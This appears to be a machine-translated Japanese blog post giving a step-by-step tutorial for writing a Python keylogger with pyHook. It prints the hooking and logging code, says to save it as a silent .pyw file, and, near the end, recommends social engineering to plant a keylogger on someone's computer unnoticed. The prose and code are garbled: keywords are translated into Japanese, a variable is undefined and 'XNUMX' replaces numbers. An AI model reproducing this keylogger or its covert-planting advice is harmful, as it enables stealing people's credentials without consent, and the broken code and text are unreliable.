キーロガーの作成方法

始める前に、私はそれを明確にする必要があります キーロガーの使用が犯罪に使用された場合、キーロガーは違法ですたとえば、誰かのデータとクレデンシャルを取得します。 この記事は、トレーニングおよび学術的な使用としてのみ作成されており、その仕組みを理解するために作成されています。

キーロガーの合法的な使用

あなたが採用することを探しているなら ペアレンタルコントロールキーロガー お子様のブラウジングを合法的に管理するために、以下をお勧めします。 それで あなたはあなたがあなたの子供たちの同意を得て、あなたが監視ソフトウェアを使用していることを彼らが知っていることを確認しなければなりません。 お住まいの国の法律を確認してください。

ペアレンタルコントロールを合法的に行うことをお勧めします:

  1. uMobixあなたはここで私たちのレビューを見ることができます
  2. mSpy あなたはここで私たちのレビューを見ることができます
  3. アイジーあなたはここで私たちのレビューを見ることができます

キーロガーとは何ですか?

キーロガーは、ハッキングの世界で広く使用されているマルウェア ソフトウェアです。 これ マルウェア デバイスを使用している人のキーボードに入力されたすべてのコンテンツを記録できます。

ソフトウェアのアクティブ中に使用される銀行やその他のアプリケーションのクレデンシャルを含むすべての種類のクレデンシャルを記録できるため、非常に危険です。

このマルウェアソフトウェアは、リモートで使用するには非常に複雑であるため、多くの知識が必要です。 しかし、私たちはあなたに教えるつもりです キーロガーを作成する ローカルコンピュータで使用できるので、それがどのように機能するかを直接確認できます。

気を付けて! パソコンでない場合は登録してしまいます あなたのパートナーの資格, 家族 u 他の人 あなたがあなた自身でそれをするか、彼らがあなたのコンピュータにアクセスできるかどうか。 明示的な同意がない場合、これは違法であり、データを記録していることを通知する必要があります。

独自のキーロガーを作成すると、コンピューターでそれを使用して、作成されたすべてのキーボードレコードを保存できるようになります。 また、事前の許可なしに誰も私たちの機器を使用しないようにすることができます。

とにかく、キーロガーとは何か、そしてその使用法について、より説明的な投稿を残しておきます。:

キーロガーの作成方法

続行するには、を使用する必要があります Python 2.7、PyhookまたはPywin32 または、作成するスクリプトを作成できなくなります。

Pythonをダウンロードするには、 このリンク、それは数分しかかかりません。

Keywloggerの作成を開始するために最初に行う必要があるのは、Pythonエディターを開くことです。

空白のドキュメント内に、次のコードを導入します。

無料のキーロガーコード


pyHook、pythoncom、sys、loggingをインポートします
#file_logを別のファイル名/場所に自由に設定してください

def OnKeyboardEvent(イベント):
logging.basicConfig(filename = file_log、level = logging.DEBUG、format = '%(message)s')
chr(event.Ascii)
logging.log(10、chr(event.Ascii))
Trueを返す
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

コピーして貼り付けたら、[保存]をクリックします。 拡張子を付けて保存することが重要です .pyw。 この方法でファイルを保持する 「Keylogger.pyw」.

良い。 キーロガーはキーボードの動きを記録し、コンピューターの使用をスパイし始める準備ができています。 このコードを使用すると、キーストロークは別のファイルに保存されます。

それでは、新しいスクリプトを始めましょう。 ファイルをダブルクリックするだけで、すべてのアクティビティの記録が自動的に開始されます。

キーロガーをオフにしたい場合は、タスクマネージャー(Control + Alt + Del)を開いて、Pythonプロセスを終了するだけです。 強制的にオフにします。

citeia.com

ここで楽しい部分があります。プロセスが終了したら、ファイル「keyloggeroutput.txt」を見つけます。 Keyloggerを保管しているのと同じディレクトリにあります。 これをダブルクリックして…。

タチャン!

キーロガーがアクティブになって以来、コンピューターで記録されたすべてのキーボードの使用記録が残っています。 あなたはすでに学びました キーロガーを作成する方法 を PC 上で実行し、特定のテストを行います。

あなたの PC が何らかの手段でこの種のウイルスに感染した場合についてお話します。 実際、キーロガーを個人のコンピュータに埋め込む方法の XNUMX つを以下に示します。一読することをお勧めします。

さて、あなたのコンピュータにキーロガーがインストールされている疑いがあり、奇妙な活動が見られたとしても、心配する必要はありません. 手動で検出して削除する方法はすでに説明しました。 ただし、PC からキーロガーを自動的に検出して排除するためのプログラムやアプリケーションがいくつかあります。

このタイプのツールに興味がある場合は、コメントを残して次のツールを決定してください。

キーロガーを誰かのコンピューターに気付かれずに植えたい場合は、ソーシャルエンジニアリングを使用して簡単に行うことができます。

ソーシャルエンジニアリングを使用すると、被害者に関する情報のコレクションを使用して誰かの考え方を理解し、ユーザーに対する効果的な攻撃を計画して開始できます。

これは、あらゆるハッキング戦略を補完できる手法の XNUMX つです (ただし、ハッキングにのみ使用されるわけではありません)。

あなたがについて知りたい場合 ハッキングにソーシャルエンジニアリングを適用する方法 次の記事を確認することをお勧めします。

人間をハッキングすることは可能ですか? ソーシャルエンジニアリング

citeia.com

でバージョンをダウンロードすることもできます 無料のPDF。 (学術用14ページ)

PDFをマガジン形式で無料でダウンロードして後で読むこともできます。

ダウンロード可能な PDF: ハッキングのための No.1 ソーシャル エンジニアリング

お役に立てば幸いです。

それはあなたに興味があるかもしれません: 私の電子メールがハッキングされたかどうかを確認するにはどうすればよいですか?

モバイル版を終了する